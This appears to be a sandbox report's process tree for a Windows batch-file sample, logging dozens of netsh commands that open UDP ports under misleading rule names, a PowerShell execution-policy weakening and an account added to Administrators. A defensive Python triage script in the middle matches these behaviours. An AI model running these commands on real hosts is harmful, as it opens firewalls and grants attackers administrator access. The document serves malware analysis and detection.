C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2828
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3612
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2280
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:72
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2956
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4176
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:4980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:4684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:1160
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3364
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1996
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4336
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4140
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3768
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:5080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:3788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2136
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4848
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2280
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3496
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2332
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:4476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:2540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:228
-
-
-
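Added example (not part of the sandbox report or of the YourCyanide.cmd sample): a Python triage of process-creation telemetry for the three behaviours the repeated cmd.exe subtrees above show. The report renders each tree entry as command line, depth, then PID, so the netsh rules actually open UDP 14541 inbound and UDP 29303 outbound while their display names advertise ports 24215 and 12640. A rule whose name disagrees with its own port filter is a cheap, high-signal check, and the volume of allow rules per parent process (dozens per cmd.exe here) is a second; `Set-ExecutionPolicy Unrestricted` and `net localgroup administrators session /ADD` (the report's "Grants admin privileges" signature) are matched directly. The event records are constructed to the shape of Sysmon Event ID 1, reusing the report's command lines and PIDs; the parent PID 1000, the benign RDP rule (PID 4100), the child PIDs 5000-5007 and the burst threshold of 5 are assumptions made for the example.

```python
"""Triage of Windows process-creation telemetry for the three behaviours this
report shows: netsh allow-rules whose names lie about their port, PowerShell
execution-policy weakening, and a local account added to Administrators."""
import re
from collections import Counter

# Constructed records shaped like Sysmon Event ID 1 (ProcessCreate). The command
# lines and PIDs are the ones in the report's first cmd.exe subtree; the parent
# PID 1000 and the benign RDP rule (pid 4100) are made up for contrast.
EVENTS = [
    {"pid": 2832, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r"C:\Windows\system32\cmd.exe /K FuckPorts.cmd"},
    {"pid": 3620, "ppid": 2832,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -command "Set-ExecutionPolicy Unrestricted"'},
    {"pid": 1260, "ppid": 2832, "image": r"C:\Windows\system32\net.exe",
     "cmd": "net localgroup administrators session /ADD"},
    {"pid": 3584, "ppid": 1260, "image": r"C:\Windows\system32\net1.exe",
     "cmd": r"C:\Windows\system32\net1 localgroup administrators session /ADD"},
    {"pid": 2588, "ppid": 2832, "image": r"C:\Windows\system32\netsh.exe",
     "cmd": 'netsh advfirewall firewall add rule name="UDP Port 24215" dir=in '
            'action=allow protocol=UDP localport=14541'},
    {"pid": 3612, "ppid": 2832, "image": r"C:\Windows\system32\netsh.exe",
     "cmd": 'netsh advfirewall firewall add rule name="UDP Port 12640" dir=out '
            'action=allow protocol=UDP localport=29303'},
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\system32\netsh.exe",
     "cmd": 'netsh advfirewall firewall add rule name="TCP Port 3389" dir=in '
            'action=allow protocol=TCP localport=3389'},
]
# Each cmd.exe parent in the report spawns dozens of the same two rules; mimic
# that under the report's second parent (PID 4980) with constructed child PIDs.
EVENTS += [{"pid": 5000 + i, "ppid": 4980, "image": r"C:\Windows\system32\netsh.exe",
            "cmd": EVENTS[4 + i % 2]["cmd"]} for i in range(8)]

NETSH_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
EXEC_POLICY = re.compile(r"Set-ExecutionPolicy\s+(?:Unrestricted|Bypass)", re.I)
LOCAL_ADMIN = re.compile(r"\blocalgroup\s+administrators\s+(\S+)\s+/add\b", re.I)


def parse_netsh_rule(cmdline):
    """Return the key=value arguments of `netsh advfirewall firewall add rule`
    as a dict with lower-cased keys, or None for any other command line."""
    if not re.search(r"advfirewall\s+firewall\s+add\s+rule", cmdline, re.I):
        return None
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in NETSH_KV.finditer(cmdline)}


def rule_name_mismatch(rule):
    """True when a name of the form '<proto> Port <n>' advertises a different
    protocol or port than the filter the rule actually installs."""
    m = re.fullmatch(r"\s*(TCP|UDP)\s+Port\s+(\d+)\s*", rule.get("name", ""), re.I)
    if not m:
        return False  # the name claims no port, so there is nothing to compare
    return (m.group(1).upper() != rule.get("protocol", "").upper()
            or m.group(2) != rule.get("localport", ""))


def triage(events, burst_threshold=5):
    """Tag suspicious events and report parents that add a burst of allow rules.
    Returns (findings, bursts): findings is a list of (pid, [tags]); bursts maps a
    parent PID to the number of allow rules it spawned once that reaches the threshold."""
    findings, rules_per_parent = [], Counter()
    for ev in events:
        image, cmd = ev["image"].lower(), ev["cmd"]
        if image.endswith("netsh.exe"):
            rule = parse_netsh_rule(cmd)
            if rule and rule.get("action", "").lower() == "allow":
                rules_per_parent[ev["ppid"]] += 1
                tags = ["firewall_allow_rule"]
                if rule_name_mismatch(rule):
                    tags.append("rule_name_port_mismatch")
                if rule.get("dir", "").lower() == "in":
                    tags.append("inbound_exposure")  # outbound is allowed by default anyway
                findings.append((ev["pid"], tags))
        elif image.endswith("powershell.exe") and EXEC_POLICY.search(cmd):
            findings.append((ev["pid"], ["execution_policy_weakened"]))
        elif image.endswith(("net.exe", "net1.exe")):
            m = LOCAL_ADMIN.search(cmd)
            if m:
                findings.append((ev["pid"], ["local_admin_group_add:" + m.group(1)]))
    bursts = {ppid: n for ppid, n in rules_per_parent.items() if n >= burst_threshold}
    return findings, bursts


if __name__ == "__main__":
    found, burst = triage(EVENTS)
    for pid, tags in found:
        print(pid, ", ".join(tags))
    print("allow-rule bursts by parent PID:", burst)
```

Run as a script it prints the tagged PIDs and the parents that crossed the burst threshold. Only the inbound rule changes the host's exposure, since Windows Firewall allows outbound traffic by default, so `inbound_exposure` is what a responder chases first. On a live host the same rules can be listed with `netsh advfirewall firewall show rule name=all`; `netsh advfirewall firewall delete rule name="UDP Port 24215"` removes every rule carrying that name at once, which is what you want here because the script created dozens of identical copies.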
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4112
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2964
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:128
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1984
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2152
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:916
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4400
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2396
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2200
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2368
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1548
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1264
-
-
C:\Windows\system32\netsh.exe (depth 3, PID 1168)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 796)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1640)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL

C:\Windows\system32\netsh.exe (depth 3, PID 1824)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Event Triggered Execution: Netsh Helper DLL

C:\Windows\system32\netsh.exe (depth 3, PID 1528)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Event Triggered Execution: Netsh Helper DLL

C:\Windows\system32\netsh.exe (depth 3, PID 4196)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4980)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 228)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1576)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 1168)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL

C:\Windows\system32\netsh.exe (depth 3, PID 1668)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4752)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Event Triggered Execution: Netsh Helper DLL

C:\Windows\system32\netsh.exe (depth 3, PID 1612)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2256)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4440)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4404)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL

C:\Windows\system32\netsh.exe (depth 3, PID 1856)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3436)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 1224)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4400)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 2056)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 1476)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 892)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4860)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4868)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2416)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3900)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3588)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 1388)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2380)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3640)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 3624)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 4196)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 1068)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1464)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2348)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1124)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 1668)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2168)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 4200)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 4688)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2332)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 3588)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

C:\Windows\system32\netsh.exe (depth 3, PID 2816)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 2260)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303

C:\Windows\system32\netsh.exe (depth 3, PID 2068)
  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541

C:\Windows\system32\netsh.exe (depth 3, PID 1732)
  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303
  - Modifies Windows Firewall

